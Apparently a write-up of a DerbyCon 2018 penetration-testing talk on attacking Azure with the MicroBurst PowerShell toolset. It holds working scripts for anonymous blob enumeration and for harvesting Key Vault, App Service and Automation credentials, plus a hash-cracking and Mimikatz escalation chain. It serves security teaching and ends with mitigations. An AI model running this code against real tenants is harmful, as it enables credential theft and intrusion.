As companies deploy more of Microsoft's Azure cloud services, the platform becomes more of a target for threat actors. By default, any domain (Azure AD) user can sign in to the Azure Portal, which exposes information that is useful during a pen test. This information can be accessed through the web interface, a REST API, or PowerShell cmdlets. The PowerShell cmdlets are preferred: they use integrated authentication, return objects that can be piped to other cmdlets, produce malleable output, and handle large data sets at scale.

The MicroBurst toolset relies on the Azure Service Management (ASM), Azure Resource Management (AzureRM), and MSOnline PowerShell modules (MSOnline is useful when the other two are locked down). Other existing tools to note are Azucar and Azurite. A good resource for further reading beyond what is discussed here is the book Pentesting Azure Applications, which discusses why to perform this testing, outlines the testing process, and provides some example scripts.

The MicroBurst toolset has multiple functions:

Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains
Get-AzurePasswords
Get-AzureDomainInfo
Get-MSOLDomainInfo

#load the module
Import-Module C:\MicroBurst\MicroBurst.psm1 -Verbose

Azure User Information

Azure Active Directory (AD) contains users, groups, phone numbers, enrolled devices, and third-party applications that use it for federated Single Sign-On through Active Directory Federation Services (ADFS). Directory synchronization (Azure AD Connect, formerly DirSync) is usually configured from a company's main on-premises domain to Azure AD, so the tenant mirrors the internal user base, and, depending on the permissions of the account in hand, one may be able to create a guest user for persistence (noisy, and an obvious indicator of compromise). All of this information can lead to additional attacks, such as password guessing, phishing, and accessing third-party web applications through Single Sign-On (SSO) functionality.

Azure File Storage

Azure Storage accounts are addressed as $STORAGE_ACCOUNT.blob.core.windows.net, with containers (folders) beneath them. Config files, virtual hard disks (VHDs), and other sensitive information may be found within a container. A storage account offers four data types: blobs (similar to S3 buckets), file shares, tables, and queues. Since arbitrary files can be stored there, hosting payloads in a blob on a Microsoft-owned, trusted URL improves the odds of payload delivery. Anonymous blob enumeration is possible when a container's public access level is set to "Container" (anonymous read access to the container and its blobs): an anonymous user who knows the storage account name and the container name can then list the files within. The "Blob" level allows anonymous download of a blob whose exact name is known, but not listing, and "Private" allows neither.
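The listing request that anonymous enumeration relies on, done by hand so the mechanics are visible. This is an added example, not MicroBurst code or anything from the talk: the storage account name, container name and the sample listing response below are constructed placeholders, and Invoke-AnonymousBlobList needs network access while ConvertFrom-BlobListing runs offline against the sample.

```powershell
# Added example (not MicroBurst code): anonymously list a public blob container and
# pick out the files worth downloading first. Account/container names are placeholders.

function Get-BlobListUri {
    param(
        [Parameter(Mandatory)][string]$StorageAccount,
        [Parameter(Mandatory)][string]$Container
    )
    # Blob service REST listing endpoint. Anonymous callers only get a listing when the
    # container's public access level is "Container"; "Blob" and "Private" containers reject it.
    "https://$StorageAccount.blob.core.windows.net/$Container`?restype=container&comp=list"
}

function ConvertFrom-BlobListing {
    param(
        [Parameter(Mandatory)][string]$Xml,     # raw <EnumerationResults> document
        [Parameter(Mandatory)][string]$BaseUri  # https://<account>.blob.core.windows.net/<container>
    )
    $doc = [xml]$Xml
    foreach ($b in $doc.EnumerationResults.Blobs.Blob) {
        [pscustomobject]@{
            Name        = $b.Name
            Size        = [int64]$b.Properties.'Content-Length'
            Modified    = $b.Properties.'Last-Modified'
            Url         = "$BaseUri/$($b.Name)"
            # File types the talk calls out: disk images, config files, scripts, key material
            Interesting = $b.Name -match '\.(vhd|vhdx|config|json|xml|ps1|bak|pfx|pem)$'
        }
    }
}

function Invoke-AnonymousBlobList {
    param(
        [Parameter(Mandatory)][string]$StorageAccount,
        [Parameter(Mandatory)][string]$Container
    )
    $uri = Get-BlobListUri -StorageAccount $StorageAccount -Container $Container
    try {
        # No credentials or SAS token: whatever comes back is what any internet user can see
        $resp = Invoke-WebRequest -Uri $uri -UseBasicParsing -ErrorAction Stop
    } catch {
        # Private containers, "Blob"-level containers and nonexistent containers all end up here
        Write-Warning "$uri is not anonymously listable: $($_.Exception.Message)"
        return
    }
    ConvertFrom-BlobListing -Xml $resp.Content -BaseUri "https://$StorageAccount.blob.core.windows.net/$Container"
}

# Constructed sample listing response (placeholder account/container) so the parser can be run offline
$sample = @'
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://example-account.blob.core.windows.net/" ContainerName="backups">
  <Blobs>
    <Blob><Name>test.vhd</Name><Properties><Last-Modified>Mon, 01 Oct 2018 12:00:00 GMT</Last-Modified><Content-Length>32212254720</Content-Length></Properties></Blob>
    <Blob><Name>web.config</Name><Properties><Last-Modified>Mon, 01 Oct 2018 12:00:00 GMT</Last-Modified><Content-Length>2048</Content-Length></Properties></Blob>
    <Blob><Name>logo.png</Name><Properties><Last-Modified>Mon, 01 Oct 2018 12:00:00 GMT</Last-Modified><Content-Length>8192</Content-Length></Properties></Blob>
  </Blobs>
  <NextMarker />
</EnumerationResults>
'@

ConvertFrom-BlobListing -Xml $sample -BaseUri 'https://example-account.blob.core.windows.net/backups' |
    Where-Object Interesting | Format-Table Name, Size, Url
```

Against a live account, `Invoke-AnonymousBlobList -StorageAccount <account> -Container <container>` returns the same objects; a non-empty `<NextMarker>` in the response means the listing is paged and a follow-up request with `&marker=<value>` is needed to see the rest.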

Azure SQL

Azure SQL is commonly used when an application requires a database in the cloud. Misconfigurations occur when the SQL server is exposed to the internet; the usual SQL weaknesses then apply, such as weak passwords and exploitable services. Within the Azure Portal, if credentials with database access rights are obtained, data can be queried from the Query editor in Azure SQL. SQL Server Management Studio can also be used: although the server firewall blocks outside connections by default, firewall misconfigurations (over-broad IP ranges) occur. It is possible to use Azure SQL as a C2 channel, as described in the post titled Databases and Clouds: SQL Server as a C2; traffic that goes to a trusted Microsoft domain, which can also serve as a pivot point, is the notable benefit.
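A check for the firewall misconfiguration described above, written as an added example rather than code from the talk or MicroBurst. The classifier needs no Azure connection and runs against the constructed sample rules at the bottom; Get-ExposedSqlServers assumes Connect-AzureRmAccount has already been run and uses the AzureRM SQL cmdlets to pull real rules.

```powershell
# Added example (not from the talk or MicroBurst): flag Azure SQL server firewall rules
# that expose the server beyond a single known host. Sample rules below are constructed.

function ConvertTo-UInt32Ip {
    param([Parameter(Mandatory)][string]$Ip)
    # Azure SQL firewall rules are IPv4 ranges; turn the address into an integer to size the range
    $bytes = [System.Net.IPAddress]::Parse($Ip).GetAddressBytes()
    [Array]::Reverse($bytes)
    [BitConverter]::ToUInt32($bytes, 0)
}

function Test-SqlFirewallRuleExposure {
    param(
        [Parameter(Mandatory)][string]$RuleName,
        [Parameter(Mandatory)][string]$StartIp,
        [Parameter(Mandatory)][string]$EndIp
    )
    $size = [int64](ConvertTo-UInt32Ip $EndIp) - [int64](ConvertTo-UInt32Ip $StartIp) + 1
    if ($StartIp -eq '0.0.0.0' -and $EndIp -eq '0.0.0.0') {
        # The special 0.0.0.0-0.0.0.0 rule ("Allow Azure services") admits any Azure-hosted
        # client, including resources in other tenants' subscriptions
        $finding = 'Any Azure-hosted client (all tenants)'
    } elseif ($size -ge 65536) {
        $finding = 'Internet-exposed: range is a /16 or larger'
    } elseif ($size -gt 1) {
        $finding = 'Range wider than one host; confirm it is owned by the customer'
    } else {
        $finding = 'Single host'
    }
    [pscustomobject]@{ Rule = $RuleName; Range = "$StartIp-$EndIp"; Hosts = $size; Finding = $finding }
}

function Get-ExposedSqlServers {
    # Requires an AzureRM session with read rights on the SQL servers
    foreach ($srv in Get-AzureRmSqlServer) {
        Get-AzureRmSqlServerFirewallRule -ResourceGroupName $srv.ResourceGroupName -ServerName $srv.ServerName |
            ForEach-Object {
                Test-SqlFirewallRuleExposure -RuleName $_.FirewallRuleName -StartIp $_.StartIpAddress -EndIp $_.EndIpAddress |
                    Add-Member -NotePropertyName Server -NotePropertyValue $srv.FullyQualifiedDomainName -PassThru
            }
    }
}

# Constructed sample rules (placeholder names and addresses) so the classifier runs without a subscription
@(
    @{ RuleName = 'AllowAllWindowsAzureIps'; StartIp = '0.0.0.0';      EndIp = '0.0.0.0' },
    @{ RuleName = 'office';                  StartIp = '203.0.113.10'; EndIp = '203.0.113.10' },
    @{ RuleName = 'temp-dev';                StartIp = '0.0.0.0';      EndIp = '255.255.255.255' }
) | ForEach-Object { $rule = $_; Test-SqlFirewallRuleExposure @rule } | Format-Table
```

The third sample rule is the classic "temporary" fix that never gets removed; it turns the server into exactly the internet-facing target the section warns about, and the server-level firewall is the only thing standing between a password-guessing attack and the database.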

Azure Credential Storage

Azure credential material is held in several places. Key Vaults contain keys, certificates, and secrets (passwords); reading them requires an access policy entry on the vault for the identity in use, which an owner of the subscription or resource group can grant to themselves. App Service configuration, which contains deployment credentials and database connection strings, is used to scale applications: the service is pointed at the application's code base and deploys servers to meet additional demand when needed. Automation Account credentials, used to run automation within Azure, are not directly readable, but they can be recovered by creating, importing, and running an automation runbook that prints them; the job output is retrieved and the runbook is then deleted. The MicroBurst function that enumerates all of this with a compromised credential is Get-AzurePasswords.
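The three collection steps above, spelled out with AzureRM cmdlets so it is clear what Get-AzurePasswords automates. This is an added example and not MicroBurst's implementation; it assumes Connect-AzureRmAccount has already been run, that the AzureRM KeyVault, Websites and Automation modules are loaded, and the runbook name MaintenanceCheck is a placeholder.

```powershell
# Added example (not MicroBurst's Get-AzurePasswords): pull credential material from Key Vaults,
# App Service configuration and Automation Accounts using the rights of the current AzureRM login.
# The runbook name is a placeholder; pick something that blends in, because it will be logged.

function Get-KeyVaultSecretsIfAllowed {
    # Data-plane access is governed by each vault's access policy, not by subscription rights
    # alone, so a call can fail even for a subscription Owner; report and keep going.
    foreach ($vault in Get-AzureRmKeyVault) {
        try {
            Get-AzureRmKeyVaultSecret -VaultName $vault.VaultName -ErrorAction Stop | ForEach-Object {
                $s = Get-AzureRmKeyVaultSecret -VaultName $vault.VaultName -Name $_.Name
                [pscustomobject]@{ Source = 'KeyVault'; Where = $vault.VaultName; Name = $_.Name; Value = $s.SecretValueText }
            }
        } catch {
            Write-Warning "No access to vault $($vault.VaultName): $($_.Exception.Message)"
        }
    }
}

function Get-WebAppConnectionStrings {
    # App Service configuration: connection strings are the usual place for database credentials
    foreach ($app in Get-AzureRmWebApp) {
        $cfg = (Get-AzureRmWebApp -ResourceGroupName $app.ResourceGroup -Name $app.Name).SiteConfig
        foreach ($cs in $cfg.ConnectionStrings) {
            [pscustomobject]@{ Source = 'AppService'; Where = $app.Name; Name = $cs.Name; Value = $cs.ConnectionString }
        }
    }
}

function Get-AutomationCredentialsViaRunbook {
    # Credential assets cannot be read from outside, but a runbook executing inside the account
    # can call Get-AutomationPSCredential and echo them: import, run, collect the output, delete.
    $runbookName = 'MaintenanceCheck'   # placeholder name
    foreach ($acct in Get-AzureRmAutomationAccount) {
        $rg = $acct.ResourceGroupName; $aa = $acct.AutomationAccountName
        $names = (Get-AzureRmAutomationCredential -ResourceGroupName $rg -AutomationAccountName $aa).Name
        if (-not $names) { continue }
        # Runbook body with the credential asset names baked in; `$c stays literal for the sandbox
        $body = ($names | ForEach-Object {
            "`$c = Get-AutomationPSCredential -Name '$_'; Write-Output ('$_' + '|' + `$c.UserName + '|' + `$c.GetNetworkCredential().Password)"
        }) -join "`n"
        $path = Join-Path $env:TEMP "$runbookName.ps1"
        Set-Content -Path $path -Value $body
        try {
            Import-AzureRmAutomationRunbook -Path $path -Name $runbookName -Type PowerShell -ResourceGroupName $rg -AutomationAccountName $aa -Published | Out-Null
            $job = Start-AzureRmAutomationRunbook -Name $runbookName -ResourceGroupName $rg -AutomationAccountName $aa
            do {
                Start-Sleep -Seconds 5
                $job = Get-AzureRmAutomationJob -Id $job.JobId -ResourceGroupName $rg -AutomationAccountName $aa
            } until ($job.Status -in 'Completed', 'Failed', 'Stopped', 'Suspended')
            Get-AzureRmAutomationJobOutput -Id $job.JobId -Stream Output -ResourceGroupName $rg -AutomationAccountName $aa | ForEach-Object {
                $n, $u, $p = $_.Summary -split '\|', 3
                [pscustomobject]@{ Source = 'Automation'; Where = $aa; Name = $n; Value = "$u : $p" }
            }
        } finally {
            # Remove the runbook; the job history still records that it ran, so this is not stealthy
            Remove-AzureRmAutomationRunbook -Name $runbookName -ResourceGroupName $rg -AutomationAccountName $aa -Force -ErrorAction SilentlyContinue
            Remove-Item $path -ErrorAction SilentlyContinue
        }
    }
}

Get-KeyVaultSecretsIfAllowed
Get-WebAppConnectionStrings
Get-AutomationCredentialsViaRunbook
```

The Automation step is the loud one: it creates, runs and deletes a resource, and every one of those actions lands in the Activity Log and the account's job history, which is exactly what a defender should alert on.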

Sample Escalation Demo Scenario

  1. Anonymously enumerate a public blob storage container with Invoke-EnumerateAzureBlobs
  2. List Files
  3. Download VHD
  4. Parse credentials from VHD file
  5. Crack hashes for local and cached creds
  6. Log in to the VM via RDP
  7. Log in to Azure with the cracked domain credentials
  8. Connect as domain user and dump domain info with Get-AzureDomainInfo
  9. List out user information, groups, and services
  10. Dump remaining domain passwords for Azure subscription with Get-AzurePasswords
  11. Get VPN access
  12. Pivot to internal domain / network

Sample Escalation Demo Runbook

#import the module
Import-Module C:\tools\MicroBurst\MicroBurst.psm1

#finds the microburst.blob.core.windows.net storage account
#also finds the container microburst.blob.core.windows.net/test
#the contents are listed and test.vhd is downloaded (a browser works) for forensic analysis

Invoke-EnumerateAzureBlobs -Base microburst

Cain is then used to extract the local Administrator hash from the SAM and SYSTEM hives in the mounted VHD. Once the hash is cracked, the Administrator account can be used to log in; Kon-Boot or editing the SAM file offline are also effective ways of getting into the system. Mimikatz is then run on the system, once logged in as Administrator, to extract additional credential material. Impacket's secretsdump.py can also be used to extract the domain cached credentials for cracking, and in the demo this produced the domain credentials that gave additional Azure access for the commands below.

#connect to Azure through a login prompt
Connect-AzureRmAccount

#confirm which account and subscription the session is using (Get-AzureAccount is the classic ASM cmdlet and does not reflect an AzureRM login)
Get-AzureRmContext

#retrieves information related to subscriptions, domain users, groups, storage accounts, etc.
Get-AzureDomainInfo -folder $FOLDER_NAME -Verbose

#retrieve available credential material (Key Vaults, App Service configs, Automation Accounts)
Get-AzurePasswords -Verbose | Out-GridView

To prevent this, do not allow Azure management access (portal and management APIs) for non-admin users, routinely review Azure for misconfigurations such as publicly listable containers and over-broad SQL firewall rules, ban weak passwords in Azure AD, and require multi-factor authentication for all users with Azure access.


Reference Index
Estimated date of talk: DerbyCon 2018
Slides: Irongeek
Title: Attacking Azure Environments with PowerShell
Speaker: Karl Fosaaen, Pen Tester